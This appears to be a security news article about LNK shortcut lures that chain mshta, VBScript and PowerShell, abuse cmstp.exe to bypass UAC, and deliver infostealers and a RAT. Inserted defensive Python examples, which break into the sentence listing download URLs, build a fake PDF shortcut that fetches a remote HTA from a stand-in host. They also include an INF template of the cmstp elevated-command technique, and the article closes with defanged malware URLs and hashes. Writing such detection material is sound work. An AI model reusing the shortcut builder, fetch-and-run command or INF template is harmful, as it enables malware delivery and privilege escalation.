Threat actors have shifted from malicious Office macros to malicious LNK (Windows shortcut) files for initial access. The change followed Microsoft's 2022 announcement that macros would be blocked by default in Office documents downloaded from the internet.
The campaign described here abuses the Microsoft Connection Manager Profile Installer, cmstp.exe, a signed Windows binary that can be made to proxy the execution of attacker-supplied commands.
The campaign resembles the Invicta Stealer infection method, but the infection chain varies, which suggests the threat actors have changed their TTPs (Tactics, Techniques, and Procedures).
In most cases the LNK file, which pulls a remote VBScript as its next stage, is distributed via spam emails inside a legitimate-looking ZIP or ISO attachment.
LNK Files to Exploit Microsoft Connection Manager Profile
The victim first downloads a ZIP file containing an LNK file disguised as a PDF. Opening the LNK triggers remote execution of a .hta file hosted on an attacker-controlled server.
Once the .hta file executes, it downloads a heavily obfuscated VBScript. When run, the VBScript de-obfuscates and launches a PowerShell loader, which acts as a PowerShell downloader.
This PowerShell downloader fetches the malware files from two URLs:
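A shortcut that poses as a PDF gives itself away in its own binary structure: the target it launches, the arguments it passes, the icon it borrows and whether it asks to run minimized are all stored in the Shell Link header and StringData. The following is an added example, not code from the article or from the Cyble report: it builds a constructed .lnk in memory that mimics the lure described above (cmd.exe launching mshta against a remote HTA, with an Acrobat icon), parses it back with a minimal MS-SHLLINK reader, and applies a few triage heuristics. The URL, paths and file names are invented for the example; the format constants follow the MS-SHLLINK specification.

```python
import struct

# Every value below is constructed for this example; nothing here is taken
# from the campaign's real samples.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HEADER_FMT = "<I16sIIQQQIiIHHII"                              # 76-byte ShellLinkHeader

FLAG_HAS_IDLIST, FLAG_HAS_LINKINFO, FLAG_HAS_NAME = 0x01, 0x02, 0x04
FLAG_HAS_RELPATH, FLAG_HAS_WORKDIR, FLAG_HAS_ARGS = 0x08, 0x10, 0x20
FLAG_HAS_ICON, FLAG_IS_UNICODE = 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # "run minimized": hides the console window from the victim

LOLBINS = ("cmd.exe", "mshta", "cmstp", "powershell", "wscript", "cscript",
           "rundll32", "regsvr32")


def build_lnk(relative_path, arguments, icon_location, show_cmd=SW_SHOWMINNOACTIVE):
    """Assemble a minimal MS-SHLLINK file: fixed header followed by StringData."""
    flags = FLAG_HAS_RELPATH | FLAG_HAS_ARGS | FLAG_HAS_ICON | FLAG_IS_UNICODE
    header = struct.pack(HEADER_FMT, 0x4C, LNK_CLSID, flags,
                         0x20,          # FileAttributes: ARCHIVE
                         0, 0, 0,       # Creation/Access/Write FILETIME (zeroed)
                         0, 0,          # FileSize, IconIndex
                         show_cmd,
                         0, 0, 0, 0)    # HotKey, Reserved1..3

    def string_data(s):  # CountCharacters (uint16) + UTF-16LE chars, no terminator
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments) \
        + string_data(icon_location)


def parse_lnk(data):
    """Pull out the fields an analyst needs to decide what a shortcut really launches."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags, = struct.unpack_from("<I", data, 0x14)
    show_cmd, = struct.unpack_from("<I", data, 0x3C)
    pos = 0x4C
    if flags & FLAG_HAS_IDLIST:      # LinkTargetIDList: uint16 size, then the list
        size, = struct.unpack_from("<H", data, pos)
        pos += 2 + size
    if flags & FLAG_HAS_LINKINFO:    # LinkInfo: uint32 size that includes itself
        size, = struct.unpack_from("<I", data, pos)
        pos += size
    unicode = bool(flags & FLAG_IS_UNICODE)

    def read_string():
        nonlocal pos
        count, = struct.unpack_from("<H", data, pos)
        pos += 2
        nbytes = count * 2 if unicode else count
        raw, pos = data[pos:pos + nbytes], pos + nbytes
        return raw.decode("utf-16-le" if unicode else "cp1252")

    fields = {"show_command": show_cmd}
    for bit, name in ((FLAG_HAS_NAME, "name"), (FLAG_HAS_RELPATH, "relative_path"),
                      (FLAG_HAS_WORKDIR, "working_dir"), (FLAG_HAS_ARGS, "arguments"),
                      (FLAG_HAS_ICON, "icon_location")):
        fields[name] = read_string() if flags & bit else ""
    return fields


def triage_lnk(fields):
    """Return the reasons a shortcut looks like a loader rather than a document link."""
    reasons = []
    target = (fields["relative_path"] or fields["name"]).lower()
    args = fields["arguments"].lower()
    if any(b in target or b in args for b in LOLBINS):
        reasons.append("launches a script host or proxy-execution binary")
    if "http://" in args or "https://" in args:
        reasons.append("remote URL in arguments")
    if fields["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("window minimized on launch")
    icon = fields["icon_location"].lower()
    if icon and icon.rsplit("\\", 1)[-1] != target.rsplit("\\", 1)[-1]:
        reasons.append("icon borrowed from a program other than the one launched")
    return reasons


# Constructed lure: looks like a PDF (Acrobat icon) but runs cmd -> mshta -> remote HTA.
SAMPLE_LNK = build_lnk(
    relative_path=r"..\..\..\Windows\System32\cmd.exe",
    arguments=r"/c start /min mshta.exe http://example.invalid/invoice.hta",
    icon_location=r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe",
)

if __name__ == "__main__":
    parsed = parse_lnk(SAMPLE_LNK)
    for key, value in parsed.items():
        print(f"{key:14} {value}")
    print("verdict:", triage_lnk(parsed) or "nothing suspicious")
```

The parser skips the LinkTargetIDList and LinkInfo blocks when present, so it also works on real shortcuts that carry them; the icon heuristic is the noisiest of the four (legitimate shortcuts often take icons from shell32.dll), so treat it as corroboration for the other signals rather than a verdict on its own.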
hxxp[:]//a0840501.xsph[.]ru/Inv.pdf
hxxp[:]//a0840501.xsph[.]ru/71iqujprzsp4w[.]exe
These files are saved under %AppData%\Roaming (the user's roaming AppData directory) with their original names: a decoy PDF and an EXE, the Redline Stealer payload. The PowerShell downloader then uses cmstp.exe, an auto-elevated Windows binary, to bypass UAC (User Account Control).
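The cmstp.exe step is where a defender has the best chance of catching this chain on the endpoint: a Connection Manager profile install launched by a script host, with silent switches, against an INF file sitting in the user's profile is not something an administrator does. The following is an added example, not code from the article or from the Cyble report. It runs simple triage logic over two constructed process-creation records shaped like Sysmon Event ID 1 and over a constructed INF written to the publicly documented cmstp.exe technique, in which commands listed under RunPreSetupCommandsSection are executed by the auto-elevated process; the article does not show the campaign's own INF, and the paths, user name and command lines here are invented.

```python
import re

# Constructed process-creation records in the shape of a Sysmon Event ID 1:
# the first mimics a loader invoking cmstp.exe against an INF dropped in the
# user's profile, the second a legitimate VPN profile install by an admin.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmstp.exe",
     "command_line": r"cmstp.exe /ni /s C:\Users\alice\AppData\Roaming\profile.inf",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"image": r"C:\Windows\System32\cmstp.exe",
     "command_line": r'cmstp.exe /s "C:\Program Files\CorpVPN\corpvpn.inf"',
     "parent_image": r"C:\Windows\explorer.exe"},
]

# Constructed INF following the publicly documented cmstp.exe technique: the
# lines under [RunPreSetupCommandsSection] are run by the auto-elevated process.
SAMPLE_INF = """
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection

[RunPreSetupCommandsSection]
; constructed payload: run a loader from the roaming profile, then kill cmstp
C:\\Users\\alice\\AppData\\Roaming\\loader.exe
taskkill /IM cmstp.exe /F

[Strings]
ServiceName="CorpVPN"
"""

SILENT_SWITCH = re.compile(r"(?:^|\s)/(?:s|ni|au)\b", re.I)  # /s /ni /au: no UI, no prompts
INF_PATH = re.compile(r'"([a-z]:\\[^"]+\.inf)"|([a-z]:\\\S+\.inf)', re.I)
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe")
EXEC_SECTIONS = ("runpresetupcommandssection", "runpostsetupcommandssection")


def inf_command_sections(inf_text):
    """Return {section: [command lines]} for the INF sections cmstp.exe executes."""
    found, current = {}, None
    for line in inf_text.splitlines():
        line = line.split(";", 1)[0].strip()  # drop INF comments
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
        elif current in EXEC_SECTIONS:
            found.setdefault(current, []).append(line)
    return found


def triage_cmstp_event(event, inf_text=None):
    """Score one process-creation event; returns the reasons it looks like abuse."""
    reasons = []
    if not event["image"].lower().endswith("\\cmstp.exe"):
        return reasons
    cmdline = event["command_line"]
    if SILENT_SWITCH.search(cmdline):
        reasons.append("silent/no-UI install switch")
    match = INF_PATH.search(cmdline)
    if match:
        inf = match.group(1) or match.group(2)
        if not inf.lower().startswith(TRUSTED_DIRS):
            reasons.append(f"INF loaded from user-writable path: {inf}")
    parent = event["parent_image"].lower().rsplit("\\", 1)[-1]
    if parent in SCRIPT_HOSTS:
        reasons.append(f"spawned by script host {parent}")
    if inf_text:  # only possible when the INF was collected from disk
        for section, commands in inf_command_sections(inf_text).items():
            reasons.append(f"INF [{section}] runs: {' | '.join(commands)}")
    return reasons


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        inf = SAMPLE_INF if "Roaming" in event["command_line"] else None
        print(event["command_line"])
        for reason in triage_cmstp_event(event, inf) or ["no findings"]:
            print("  -", reason)
```

The silent switch alone is a weak signal, as the second record shows: legitimate VPN and RAS profile installs use it too. The INF location and the parent process carry the weight, and if the INF can be pulled from the host, its RunPreSetupCommandsSection tells you exactly what was executed with elevated rights. A child process of cmstp.exe (cmd.exe, powershell.exe) in the same process tree is a further confirmation worth alerting on.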
Weaponized LNK Files Uncovered
According to the report shared with Cyber Security News, the payloads delivered by the weaponized LNK files were identified as Blank Grabber, Redline Stealer, and NetSupport RAT.
Blank Grabber is an open-source, Python-based stealer with a GUI builder that makes generating stealer payloads easy. Its build options include a custom icon, UAC bypass, and persistence at startup.
Redline Stealer is sold on cybercrime forums and is one of the most prominent infostealers in circulation. It is used to harvest sensitive information such as passwords, login credentials, browser autofill data, and credit card details.
NetSupport RAT is a commercial remote administration tool intended for legitimate remote access by administrators, but it is misused by threat actors to gain unauthorized access.
A complete report published by Cyble researchers provides further details on the obfuscation, attack vector, YARA rules, and other indicators.
Indicators of Compromise
Indicators | Indicator Type | Description
110ea5727b750a69876de6613ba71c8f80ededd2e7cef2a276a855082affcd9f | SHA256 | Blank Grabber
https[:]//transfer.sh/iATCFJFn3d/Video_of%20Dollar_Recalling.exe | URL | Malicious URL
a6c163e45059640158828422622606f0d1608bb61ed0cb3cb27a138fe1c50c6d | SHA256 | Malicious HTA File
hxxp[:]//onlythefamily[.]ddns.net/crypt[.]exe | URL | Malicious URL
hxxp[:]//a0820799.xsph[.]ru/Payload[.]exe | URL | Malicious URL
27fd34dae9c30605a0739011fce957acd40c679b1b19a079946c4a6e6a0445f9 | SHA256 | Redline Stealer
513bc40cedbb94ee65afe77dac8464bb2693a098a15a08bb68a761acec223cdd | SHA256 | Redline Stealer
3225120683b1449548f441eb5649bf6efc38af4ff74975ecb203ea8766247115 | SHA256 | Malicious Lnk File
bbbebe67be31bcc286fe08f24ade73cb162f7f501c974151e66fc375c2f22563 | SHA256 | Malicious Lnk File
9905c430c3aa6e909c773af010ef8045521aba759d20a036ce065d8bf88eb9ee | SHA256 | Malicious HTA File
49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3 | SHA256 | NetSupport Manager
hxxps://montec-shop[.]de/images/client32[.]exe | URL | Malicious URL
hxxp[:]//94.156.253[.]17/Downloads/careabout[.]hta | URL | Malicious URL
6f08017be2fb3359cc15e2325e934465a9e7257657809f712c85f51a568e9dfc | SHA256 | Malicious Lnk File
0786f1889d5f3f73b5d25289b2d9d8f6a578758bc6987f88d8ae7c81c2baacd9 | SHA256 | Malicious Lnk File
e9abe79fceded092601af33d75859030242fd1e9ad4978cd1ceba5d9e9d88d7e | SHA256 | Malicious Lnk File
de3d0a11dec2e3b4afce991a690024e96dca389f8a0a3c6a65b559c9f1c12d59 | SHA256 | Malicious Lnk File
f9446736df6a16ba5747b617d8f69a327ec150a07f7e0adb944b65e23c2fcdc9 | SHA256 | Malicious Lnk File
8f65f6a346f568171760ce5b747bd6177a2e0111d37a3df5047905c4f1f86346 | SHA256 | Malicious Lnk File
687baa62d88a16ae54e4ff3ad584a5c7bdf71121a0fc84d863363f064cd6053b | SHA256 | Malicious Lnk File
1126845e909b7c776e5b48bf64db24f19b0183b7204f50aedfb8ecba52c8dcbb | SHA256 | Malicious Lnk File
c2807549c5965cf165839b876f8dd3ea44d51478e4cdc4dcca6146b223b0066d | SHA256 | Malicious Lnk File
cf8decdb1efe459a0e8d5817d209cfdd27731694956db3e111f1f8cb32456a7a | SHA256 | Malicious Lnk File
837f7e7a6799e25767839e487d97a5b61d9dc43add143e4b3680d756fefc1b95 | SHA256 | Malicious Lnk File
845087bb407b34d8003174a3b63b6c50c7ab4b13ef81636b8344740bb7a8559c | SHA256 | Malicious Lnk File
a2dfcc3e26858a9c730b7c10b55f82ae4dcea1a35826cfbe992287df80c4929b | SHA256 | Malicious Lnk File
84172e09798be8252fb18887e9cd29e47279df9641ab50185a6eea50f4c02fef | SHA256 | Malicious Lnk File
59b392a0ff9a3ff064b5a4ab90de5b68c758429280c612fd08f9399475d3108d | SHA256 | Malicious Lnk File
48cffc07e026c38234b77ca74d30a07a01f16da9d8ab24be73c934d6972f0ace | SHA256 | Malicious Lnk File
cc652a2be3f935f1bf3c40f7033239e09357da22f98b6abcab17bbb34266a02a | SHA256 | Malicious Lnk File
df86358f815e4c6760f5005a283c5e842dd7091dc328ac0f73b7667f6754c8bc | SHA256 | Malicious Lnk File
8b6ea98bb931bf67bcea0ff67cc5d44d956a4b3fffd1817e1f3ad89696fb3798 | SHA256 | Malicious Lnk File
f602321b7a764a0dffe32d9dfbac7c221fcf200f13d20e4fbfe978d56496a72b | SHA256 | Malicious Lnk File
d1825f07b07560f8d76c8d9125fc3029a4b328ecca836d01b5934ff8f02a32e1 | SHA256 | Malicious Lnk File
a08c36812818618f44782c3677c8b8b8159a1beacbad66adbe232e694d91176e | SHA256 | Malicious Lnk File
e9cbfe72cf4bf807f57df16611bea622c77ad501ee85c39ed171b8cdb05ba092 | SHA256 | Malicious Lnk File
3a00180db6da59cc44933db6faa043b1ae770098a4eb52d5c2f4cf060cb60d72 | SHA256 | Malicious Lnk File
7fd01399dec681c37cd14edeb37c601a85e1a3e567d0ff2accca1dad4bc9c53b | SHA256 | Malicious Lnk File
The post Hackers Use Weaponized LNK Files to Exploit Microsoft Connection Manager Profile appeared first on Cyber Security News.